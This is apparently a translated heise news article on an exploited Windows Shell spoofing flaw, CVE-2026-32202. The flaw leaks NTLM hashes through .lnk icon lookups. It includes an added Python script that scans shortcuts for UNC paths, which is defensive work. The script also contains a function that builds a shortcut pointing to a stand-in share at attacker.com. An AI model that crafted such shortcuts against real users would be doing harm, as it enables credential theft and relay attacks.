Windows Shell vulnerability is being attacked

In February, Microsoft closed a Windows Shell vulnerability, but incompletely. Attacks have now been discovered. A patch helps.


Microsoft fixed a security vulnerability in the Windows Shell on the February patch day – CVE-2026-21510, which was attacked in the wild by the cyber gang APT28 – better known as Fancy Bear. The patch was insufficient and left another security vulnerability. And that is now also being attacked on the internet.

Microsoft fixed the new vulnerability CVE-2026-32202 (CVSS 4.3, risk "medium") on the April patch day with software updates. Over the course of Monday, however, the developers updated the vulnerability entry: according to the updated entry, the spoofing vulnerability in the Windows Shell is now also being exploited in the wild by malicious actors. The impact appears to be less severe than before the insufficient patch from February.

Attackers can read some sensitive information, but cannot alter information or make resources unavailable. Microsoft further explains that a protection mechanism is not working correctly, allowing malicious actors to carry out spoofing attacks over the network. According to Microsoft, however, victims must execute a malicious file that attackers send them. Installing the update from the patch day protects against exploitation of the vulnerability.

Akamai has published a more detailed analysis in its blog. Unlike Microsoft, the IT analysts classify the new vulnerability as a zero-click vulnerability: victims' computers authenticate themselves to the attackers' server without user interaction. The original attack allowed the execution of malicious code from the network (RCE, Remote Code Execution). The first patch used SmartScreen to block unsigned or untrusted LNK files, for example those referring to CPL files. However, the programmers overlooked one spot in the code path: Windows Explorer tries to extract an icon for the target file (a .cpl) referenced by files such as .lnk, and the path check that takes place there includes connecting to external SMB servers. This happens while the directory is being displayed, without any further user clicks.

For example, the LNK file contains a shortcut to "\\attacker.com\share\payload.cpl", causing the computer to establish a connection to the SMB server "\\attacker.com\" when listing the directory and initiating an automatic NTLM authentication, thereby sending the victim computer's Net-NTLMv2 hash to the attackers. This can then be misused in NTLM relay attacks and for offline cracking, Akamai further explains.
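As an added illustration (not part of the heise article or of Akamai's analysis), the following Python script parses the path-carrying fields of a Shell Link (.lnk) file, as documented in the MS-SHLLINK format, and flags any that point to a UNC share, which is exactly the condition described above: a shortcut whose target or icon location lives on a remote server makes Explorer reach out to that server while listing the directory. The sample shortcut is constructed inline rather than captured from a real attack; the LinkInfo unicode offsets and the ExtraData blocks are not parsed, and the "high"/"medium" labels are this script's own convention, not Microsoft's or Akamai's.

```python
import struct

# LinkFlags bits from the MS-SHLLINK specification
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Shell Link CLSID {00021401-0000-0000-C000-000000000046} in on-disk (little-endian) layout
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C


def _cstr(buf, off):
    """Read a null-terminated ANSI string starting at offset `off`."""
    return buf[off:buf.index(b"\x00", off)].decode("latin-1")


def parse_lnk(data):
    """Return the path-like fields of a .lnk file as a dict (field name -> string)."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    fields = {}
    if flags & HAS_LINK_TARGET_ID_LIST:            # skip the IDList; it is size-prefixed
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfo: local base path and/or network share
        base = pos
        info_size, _hdr_size, info_flags, _vol_off, local_off, cnrl_off, suffix_off = struct.unpack_from("<7I", data, base)
        if info_flags & 0x1:                       # VolumeIDAndLocalBasePath
            fields["LocalBasePath"] = _cstr(data, base + local_off)
        if info_flags & 0x2:                       # CommonNetworkRelativeLinkAndPathSuffix
            cnrl = base + cnrl_off
            _size, _cflags, net_off, _dev_off, _prov = struct.unpack_from("<5I", data, cnrl)
            net_name = _cstr(data, cnrl + net_off)  # e.g. \\server\share
            suffix = _cstr(data, base + suffix_off)
            fields["NetworkPath"] = net_name.rstrip("\\") + "\\" + suffix if suffix else net_name
        pos = base + info_size

    def read_string():                             # StringData entry: 2-byte char count, no terminator
        nonlocal pos
        n = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            s, pos = data[pos:pos + 2 * n].decode("utf-16-le"), pos + 2 * n
        else:
            s, pos = data[pos:pos + n].decode("latin-1"), pos + n
        return s

    for bit, name in ((HAS_NAME, "Name"), (HAS_RELATIVE_PATH, "RelativePath"), (HAS_WORKING_DIR, "WorkingDir"),
                      (HAS_ARGUMENTS, "Arguments"), (HAS_ICON_LOCATION, "IconLocation")):
        if flags & bit:
            fields[name] = read_string()
    return fields                                  # ExtraData blocks (after StringData) are not parsed here


def triage(data):
    """Flag every field that points at a UNC path; a .cpl on a share is the case from the article."""
    findings = []
    for name, value in parse_lnk(data).items():
        if value.startswith("\\\\"):
            severity = "high" if value.lower().endswith(".cpl") else "medium"
            findings.append((severity, name, value))
    return findings


def build_sample_lnk(net_name, suffix, icon_location):
    """Construct a minimal .lnk (hypothetical sample, not a captured file) for testing the parser."""
    flags = HAS_ICON_LOCATION | IS_UNICODE
    link_info = b""
    if net_name is not None:
        flags |= HAS_LINK_INFO
        net_bytes = net_name.encode("latin-1") + b"\x00"
        suffix_bytes = suffix.encode("latin-1") + b"\x00"
        cnrl = struct.pack("<5I", 0x14 + len(net_bytes), 0, 0x14, 0, 0) + net_bytes
        cnrl_off = 0x1C                            # LinkInfoHeaderSize without unicode offsets
        suffix_off = cnrl_off + len(cnrl)
        info_size = suffix_off + len(suffix_bytes)
        link_info = struct.pack("<7I", info_size, 0x1C, 0x2, 0, 0, cnrl_off, suffix_off) + cnrl + suffix_bytes
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<II", flags, 0x80)  # FILE_ATTRIBUTE_NORMAL
    header += b"\x00" * 24                         # creation/access/write times
    header += struct.pack("<IIIH", 0, 0, 1, 0)     # FileSize, IconIndex, ShowCommand=SW_SHOWNORMAL, HotKey
    header += b"\x00" * 10                         # Reserved1/2/3
    string_data = struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")
    return header + link_info + string_data + struct.pack("<I", 0)  # terminal ExtraData block


# Constructed samples: the share path is the one quoted from Akamai above; the benign one is hypothetical
SAMPLE_MALICIOUS = build_sample_lnk("\\\\attacker.com\\share", "payload.cpl", "\\\\attacker.com\\share\\payload.cpl")
SAMPLE_BENIGN = build_sample_lnk(None, None, "%SystemRoot%\\system32\\shell32.dll")

if __name__ == "__main__":
    for label, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, triage(sample))
```

Run against a directory of shortcuts (for example a quarantined mail attachment folder) before it is opened in Explorer, the script gives defenders a way to spot shortcuts that would trigger an outbound SMB connection on display; it does not remove the need for the April update, since Explorer still parses the file regardless of what a scanner reports.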

The heise security pro webinar "Securing Authentication in Active Directory: Surviving (and Thriving) with Microsoft's Outdated Concepts" provides admins with guidance on security, with in-depth explanations and background information on Net-NTLM.

(dmk)


This article was originally published in German. It was translated with technical assistance and editorially reviewed before publication.